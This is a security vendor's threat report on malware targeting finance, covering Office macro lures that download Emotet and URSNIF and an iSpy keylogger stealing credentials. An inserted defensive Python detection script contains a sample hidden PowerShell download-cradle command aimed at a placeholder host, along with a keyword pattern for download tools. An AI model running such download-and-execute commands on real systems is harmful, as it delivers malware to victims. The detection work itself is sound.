Malscape Snapshot: Finance

The Latest 100 Threats Seen in Finance . . .

Lastline® sequences and indexes millions of submissions to our Global Threat Intelligence Network. This snapshot explores the latest 100 malicious samples analyzed by Lastline that target the finance sector or finance departments across industries. This snapshot also compares the statistical data for all threats seen over the last 30 days in finance to the results in the Q4 2017 global Malscape® Monitor Report to highlight differences between threats targeting finance and the broader threat landscape.

The threat samples reflected in this report were submitted to Lastline for analysis after having been scrutinized and released by the upstream gateway, endpoint, and network security technologies. The findings provide insights into more advanced and sophisticated malware samples and threats that are able to evade conventional detection, and therefore don’t reflect the overall threat landscape. Lastline truly acts as The Last Line of Defense®, providing visibility into the advanced threats to organizations that slip past other defenses.

Key Findings In Contrast to Global Findings

Lastline analyzed all threats targeting finance departments and financial services companies over the past 30 days and compared them to global findings shared in the Malscape Monitor Report.

  1. Lastline found that the average number of malicious files that other security controls allow to infiltrate network traffic within the finance sector was one in every 340 email or web transactions (see Figure 1). This is a higher level than the average of 1 in 500 seen across the global malscape. One possible reason is that the finance sector applies stronger security controls that more effectively pre-filter files before they are submitted to Lastline, so that a larger share of what reaches Lastline is malicious. And while this may appear in relative terms to be a very small number, when one considers the total volume of email attachments received and webpages visited on any given day by financial institutions and finance departments, the volume of malicious samples escaping detection can become quite large.
    Figure 1: The vast majority of files that Lastline analyzes are benign. But still, some malicious files are detected even after being released by other products.

  2. Within the finance sector, 30 file types are used to deliver malware, lower than the global average of 40 file types; this is not surprising given that the sample is narrowed to one industry. There is also a significant difference in the mix of file types seen in finance compared to the global landscape, with email-related file types such as Microsoft Office documents and rich text format (RTF) documents dominating the sector’s encounter rate (see Figure 2).
    Figure 2: Malicious file type distribution.

  3. Twenty-seven percent of files had not previously been submitted to VirusTotal for analysis, a significant deviation from the global average of 65%. This delta could be explained by a more mature security process in which finance companies are more rigorous about submitting files to malware portals for detection purposes before submitting them to Lastline.
  4. Sixty-five percent of threats that were submitted to VirusTotal had only generic detections, offering no ability to adapt incident response procedures to correctly remediate the threat. The typical incident response guidance from tools that identify files with these generic descriptions is to restore the device from a known good backup or simply perform a clean re-image. The issue with providing generic guidance is that it does not address the very significant threat posed by malware that is designed to steal credentials, for example. Without knowing what the malware is actually capable of doing, it’s impossible to effectively and completely remediate it.
    Figure 3: AV label detections for findings 3 and 4.

  5. One in 10 malware threats displayed advanced behaviors, meaning they are designed to use packing to avoid static analysis, evade dynamic analysis, remain stealthy, and steal credentials. This is a higher level of advanced threats than the global average of 1 in 12. The explanation could be that the finance sector’s more effective security requires a more sophisticated threat to successfully breach a company’s defenses. Figure 4 shows the AV labeling for files exhibiting packer, evasion, stealth and steal behaviors. This class of threat shows much lower levels of submission to VirusTotal than in finding 3. An explanation is that these behaviors allow the files to appear benign to security scanning and so avoid the submission checks in the security process.
    Figure 4: AV label for threats that have packer, evasion, stealth and steal capabilities.

The Latest 100 Threats Seen in Finance: Analyzed

Moving to the latest 100 threat reports that specifically target the finance industry, we can see that we have captured a Microsoft Office-based campaign. Various Office file extensions comprise 62% of the recent file types, with the remaining 38% being Portable Executable files (see Figure 5).

Of the recent file types, 69% are Unclassified in terms of the specific type of malware detected. This means that at time of submission to Lastline they had already been submitted to VirusTotal, but there was no positive detection of maliciousness (see Figure 6). The unclassified rate for Microsoft Office files is 99% in this time frame.

Figure 5: The latest 100 threats seen in finance and their file type.

Figure 6: The latest 100 threats by the type of malware detected.

These Microsoft Office documents often share a common lure, an example of which is shown in Figure 7, and demonstrate a consistent set of behaviors, as shown in Figure 8. The documents use Windows scripting utilities such as PowerShell to download the final payload, which is often a new variant of sophisticated keylogger malware such as URSNIF or Emotet.

Figure 7: Example of a Microsoft Office lure.

Figure 8: Behaviors displayed by the malicious document.

We can see the infection techniques used by the malicious Office files in Figure 8. Once the user has enabled the content of the Office document, the malware spawns a command shell and PowerShell to fetch the main payload from an Internet address embedded in the document. Both main payloads are mature modular trojans that keep adding functionality to their arsenal, and both go by a number of aliases: Emotet is also known as Geodo and Feodo, and URSNIF as Gozi, ISFB and Goznym.
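The chain above (enabled Office content spawning cmd.exe/PowerShell that fetches a payload) is visible in endpoint process-creation telemetry. The following is an added detection example, not Lastline code: it flags shells parented by an Office application and raises severity when the command line also looks like a download stage. The field names follow Sysmon Event ID 1 conventions and the sample events are constructed.

```python
import json
import re
from typing import Optional

# Office hosts that should seldom spawn a command interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Command-line fragments typical of a download stage (matched case-insensitively).
DOWNLOAD_HINTS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|bitsadmin|certutil|https?://", re.I)


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> Optional[dict]:
    """Alert when an Office app launches a shell; severity is 'high' if the
    child's command line also looks like it fetches from the network, else 'medium'."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SHELLS:
        return None
    cmdline = event.get("CommandLine", "")
    severity = "high" if DOWNLOAD_HINTS.search(cmdline) else "medium"
    return {"host": event.get("Computer", "?"), "parent": parent,
            "child": child, "severity": severity, "cmdline": cmdline}


def scan(lines) -> list:
    """Run score_event over JSON-per-line process-creation events; return alerts."""
    return [a for a in (score_event(json.loads(l)) for l in lines if l.strip()) if a]


# Constructed sample events using Sysmon Event ID 1 field names; not real telemetry.
SAMPLE_LOG = [
    json.dumps({"Computer": "FIN-WS01", "ParentImage": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
                "Image": "C:\\Windows\\System32\\cmd.exe",
                "CommandLine": "cmd /c powershell -w hidden (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"}),
    json.dumps({"Computer": "FIN-WS01", "ParentImage": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": "powershell -Command Get-Date"}),
    json.dumps({"Computer": "FIN-WS02", "ParentImage": "C:\\Windows\\explorer.exe",
                "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd"}),
    json.dumps({"Computer": "FIN-WS03", "ParentImage": "C:\\Program Files\\Microsoft Office\\EXCEL.EXE",
                "Image": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "wscript invoice.vbs"}),
]
```

Running `scan(SAMPLE_LOG)` yields three alerts (one high, two medium); the explorer-parented shell is ignored. In production the same rule is expressed as an EDR or SIEM query over the parent/child image and command-line fields.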

It is not only the lure document that Emotet and URSNIF have in common. Emotet, first spotted in 2014, shares some of its functional design with URSNIF, which dates back to 2007. They also share an evasion module for detecting dynamic analysis environments, and common methods for infiltrating financial transactions such as a man-in-the-middle network sniffing capability and hijacking of automated transfer payments. Because both are modular, criminals have developed and added new features over time, including lateral movement, additional credential theft, and spam capabilities.

Trojan.filerepmalware and Suspicious Filerepmalware are iSpy Keyloggers

In addition to the advanced trojans URSNIF and Emotet, trojan.filerepmalware also features prominently in the latest 100 threats. On further analysis, we could see explicit behaviors in these samples pointing towards a highly functional Remote Access Trojan (RAT).

Figure 9: Behaviors displayed by trojan.filerepmalware.

By intercepting the communication with the command and control server we found an identifying signature of the iSpy Keylogger tool in the process of exfiltrating website, email, and FTP credentials for this victim as well as license key information for installed products (see Figure 10).

Figure 10: Example of iSpy Keylogger stealing credentials.

Figure 11: Criminals, including HawkSpy, are using Twitter to promote the iSpy Keylogger.

The iSpy Keylogger (see Figure 11 for an example of how it is being promoted by one particular criminal organization) is a variant of the notorious HawkEye logger, a fully functioning keylogger that sends victim credentials via SMTP or FTP to a server under the keylogger operator’s control. Samples analyzed by Lastline in this time frame sent victim credentials to an outsourcing organization based in India with ISO 27001:2013 accreditation. This might indicate that the keylogger operator is reusing an earlier victim: not only are victim credentials used to infiltrate business transactions, but prior victims’ infrastructure is also being used to receive stolen data from new victims.

Conclusion

Banking and finance is not just a vertical industry in its own right, it is also a function that spans every industry. And whether a finance department or a financial services company, it presents an attractive target for criminals.

The threats described in this snapshot are the result of our analysis of all threats targeting finance departments and the financial industry over the past 30 days, plus the 100 latest malware samples submitted by Lastline customers specifically in the financial vertical. There were significant differences in the trends seen as compared to the global average, probably due to (appropriately) heightened levels of security controls in finance. These levels have raised the bar for cyberthreats to successfully infect a device on an internal finance network. The increased sophistication of the attacks that we analyzed in these latest 100 threats – fast evolving email campaigns that avoided detection and professionally developed modular payloads with advanced evasion techniques – demonstrates how criminals have raised the bar in their attacks against a well-prepared finance industry.

To read about the global trends against which we compared our findings in Finance in this snapshot, please download our Q4 2017 Malscape Monitor Report.

Andy Norton

Andy has been involved in cyber security best practice for over 20 years, specializing in establishing emerging security technologies at Symantec, Cisco and FireEye. In that time, he has presented threat and intelligence briefings for both Bush and Obama administrations, The Cabinet office, the Foreign and Commonwealth office, SWIFT, Swiss National Bank, Prudential Regulation Authority, the Bank of England, The Hong Kong Monetary Authority and NASA. Returning to Europe from Asia in 2011, he has spent the past 5 years helping many of the FTSE 250 companies measure, manage and respond to cyber incidents.